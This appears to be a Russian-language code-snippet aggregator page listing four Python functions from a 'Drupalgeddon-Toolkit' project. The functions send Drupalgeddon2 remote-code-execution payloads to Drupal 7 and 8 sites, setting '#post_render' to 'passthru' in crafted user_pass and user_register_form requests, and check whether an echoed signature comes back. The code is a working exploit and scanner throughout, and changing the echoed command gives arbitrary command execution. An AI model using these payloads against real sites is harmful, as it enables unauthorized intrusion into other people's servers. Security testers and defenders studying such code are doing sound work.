Python genSignature примеры использования

Пример #1

Файл: Scan_7600.py Проект: opflep/Drupalgeddon-Toolkit

def isPwnAbleWithQ(host):
    signature = ulti.genSignature()
    get_params = {'q': 'user/password', 'name[#post_render][]': 'passthru',
                  'name[#type]': 'markup',
                  'name[#markup]': 'echo ' + signature}
    post_params = {'form_id': 'user_pass',
                   '_triggering_element_name': 'name'}
    try:
        r = requests.post(host, data=post_params,
                          params=get_params, verify=False, timeout=20)
    except Exception as e:
        # print e
        return False
    m = re.search(r'<input type="hidden" name="form_build_id"'
                  ' value="([^"]+)"', r.text)
    if m:
        found = m.group(1)
        get_params = {'q': 'file/ajax/name/#value/' + found}
        post_params = {'form_build_id': found}
        res = requests.post(host, data=post_params, params=get_params)
        detect = bool(re.search(signature, res.text))
        n = bool(re.search('echo ' + signature, res.text))
        if detect and not n:
            return True
    else:
        return False

Пример #2

Файл: Scan_7600.py Проект: opflep/Drupalgeddon-Toolkit

def exploitD7Clean(host):
    signature = ulti.genSignature()
    if(host[-1:] != '/'):
        host += '/'
    url = host + 'user/password'
    get_params = {'name[#post_render][]': 'passthru',
                  'name[#type]': 'markup',
                  'name[#markup]': 'echo ' + signature}
    post_params = {'form_id': 'user_pass',
                   '_triggering_element_name': 'name'}
    try:
        r = requests.post(url, data=post_params,
                          params=get_params, verify=False)
    except Exception as e:
        # print e
        return False
    m = re.search(r'<input type="hidden" name="form_build_id"'
                  ' value="([^"]+)"', r.text)
    if m:
        found = m.group(1)
        url = ''.join([host, 'file/ajax/name/%23value/', found])
        post_params = {'form_build_id': found}
        # post url, not host
        res = requests.post(url, data=post_params)
        detect = bool(re.search(signature, res.text))
        n = bool(re.search('echo ' + signature, res.text))
        if detect and not n:
            return True
        else:
            return False
    else:
        return False

Пример #3

Файл: Scan_7600.py Проект: opflep/Drupalgeddon-Toolkit

def exploitD8(host):
    signature = ulti.genSignature()
    url = ulti.genURLD8(host)
    post_params = {'form_id': 'user_register_form', '_drupal_ajax': '1',
                   'mail[a][#post_render][]': 'passthru',
                   'mail[a][#type]': 'markup',
                   'mail[a][#markup]': 'echo ' + signature}
    try:
        res = requests.post(url, data=post_params, verify=False, timeout=50)
    except Exception as e:
        # print e
        return False
    detect = bool(re.search(signature, res.text))
    n = bool(re.search('echo ' + signature, res.text))
    if detect and not n:
        return True
    else:
        return False

Пример #4

def isPwnAble_2018(host, version, headers):
    signature = ulti.genSignature()
    version = version[:1]
    if version == '7':
        get_params = {
            'q': 'user/password',
            'name[#post_render][]': 'passthru',
            'name[#type]': 'markup',
            'name[#markup]': ' echo ' + signature
        }
        post_params = {
            'form_id': 'user_pass',
            '_triggering_element_name': 'name'
        }
        try:
            r = requests.post(host,
                              data=post_params,
                              params=get_params,
                              verify=False,
                              headers=headers,
                              timeout=1)
        except:
            return False
        m = re.search(
            r'<input type="hidden" name="form_build_id"'
            ' value="([^"]+)"', r.text)
        if m:
            found = m.group(1)
            get_params = {'q': 'file/ajax/name/#value/' + found}
            post_params = {'form_build_id': found}
            res = requests.post(host,
                                data=post_params,
                                params=get_params,
                                headers=headers,
                                timeout=1)
            detect = bool(re.search(signature, res.text))
            if detect:
                return True
        else:
            return False
    if version == '8':
        host = ''.join([
            host, 'user/register?element_parents=account/mail/%23',
            'value&ajax_form=1&_wrapper_format=drupal_ajax'
        ])
        post_params = {
            'form_id': 'user_register_form',
            '_drupal_ajax': '1',
            'mail[a][#post_render][]': 'passthru',
            'mail[a][#type]': 'markup',
            'mail[a][#markup]': ' echo ' + signature
        }
        try:
            r = requests.post(host,
                              data=post_params,
                              verify=False,
                              headers=headers,
                              timeout=1)
        except:
            return False

        m = bool(re.search(signature, r.text))
        if m:
            return True
        else:
            return False